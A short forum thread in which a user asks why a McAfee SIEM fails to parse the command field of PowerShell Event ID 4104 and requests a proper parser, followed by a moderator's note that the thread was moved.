I am wondering if anyone had any luck ingesting this event. I'm running the latest SIEM version and PowerShell Event ID 4104 is not parsing correctly. I see the domain and username but not the command.
It's been years since this command was introduced and given the frequency of PowerShell attacks, I'm really surprised that the SIEM cannot parse this event. Event ID 800 is parsing correctly, however this is a legacy event that is not present in WIndows 2016 systems. Event 4104 also contains more information.
If someone from McAfee is reading this, can we please have a proper parser for this event.
Solved! Go to Solution.
I moved this out of an area it was placed in incorrectly. (No fault of yours)
Hopefully someone with Corporate knowledge will add to the discussion in short order.